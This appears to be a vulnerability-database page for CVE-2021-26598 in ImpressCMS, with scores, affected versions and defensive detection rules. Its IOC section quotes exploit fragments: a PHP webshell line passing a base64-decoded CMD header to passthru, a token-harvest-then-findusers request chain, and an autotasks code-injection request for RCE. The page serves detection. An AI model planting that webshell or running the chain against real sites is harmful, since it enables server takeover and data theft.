cbcvebase.
CVE-2021-26598
published 2022-03-28

CVE-2021-26598: ImpressCMS before 1.4.3 has Incorrect Access Control because include/findusers.php allows access by unauthenticated attackers (who are, by design, able to have…

PriorityP345medium5.3CVSS 3.1
AVNACLPRNUINSUCLINAN
EXPLOIT
EPSS
10.81%
95.3th percentile
ImpressCMS before 1.4.3 has Incorrect Access Control because include/findusers.php allows access by unauthenticated attackers (who are, by design, able to have a security token).

Affected

2 ranges
VendorProductVersion rangeFixed in
impresscmsimpresscms< 1.4.31.4.3
impresscmsimpresscms>= 0 < 1.4.31.4.3

Detection & IOCsextracted from sources · hover to see the quote

path/include/findusers.php
url/misc.php?action=showpopups&type=friend
url/include/findusers.php?token={{token}}
commandcurl_setopt($ch, CURLOPT_URL, "{$url}include/findusers.php"); ... $params = "user_submit=1&token={$token[1]}&groups[]=%s";
commandif (isset($_SERVER[HTTP_CMD])) { print(____); passthru(base64_decode($_SERVER[HTTP_CMD])); die; }
path/modules/system/admin.php
commandfct=autotasks&sat_name=rce&sat_code={$phpcode}&sat_enabled=1&op=addautotasks
  • Detect unauthenticated GET requests to /include/findusers.php with a token parameter — this endpoint should not be accessible without authentication and is the core of CVE-2021-26598.
  • Alert on responses from /include/findusers.php containing all three fields: 'last_login', 'user_regdate', and 'uname' — this indicates successful unauthorized user data enumeration.
  • Monitor for the two-step exploit sequence: first a GET to /misc.php?action=showpopups&type=friend to harvest a TOKEN_REQUEST value, immediately followed by a request to /include/findusers.php using that token — this is the canonical exploitation pattern.
  • Detect regex pattern matching TOKEN_REQUEST extraction from HTTP responses: `REQUEST' value='(.*?)'` or `REQUEST" value="(.*?)"` — used by attackers to automate token harvesting.
  • Alert on POST requests to /modules/system/admin.php with body parameters containing 'fct=autotasks' and 'op=addautotasks' — this is the RCE escalation step chained after CVE-2021-26598 exploitation.
  • Detect HTTP requests to the ImpressCMS root URL containing a custom 'CMD' header with a base64-encoded value — this is the webshell command execution mechanism planted via the autotasks RCE chain.
  • Flag POST requests to /include/findusers.php with parameters 'user_submit=1' and 'groups[]' containing SQL injection payloads (e.g., SLEEP, ORD, SUBSTR, INSERT INTO) — indicative of chained SQLi exploitation (CVE-2021-26599).
  • ·The security token required to exploit /include/findusers.php is legitimately obtainable by unauthenticated users via /misc.php?action=showpopups&type=friend — token presence alone does not indicate authorization. Detection must focus on the unauthenticated context of the request, not token validity.
  • ·The Nuclei template uses a two-request chain with an internal extractor; single-request detections against /include/findusers.php without the preceding token-harvest step may produce false negatives if the token is required to be valid.

CVSS provenance

nvdv3.15.3MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.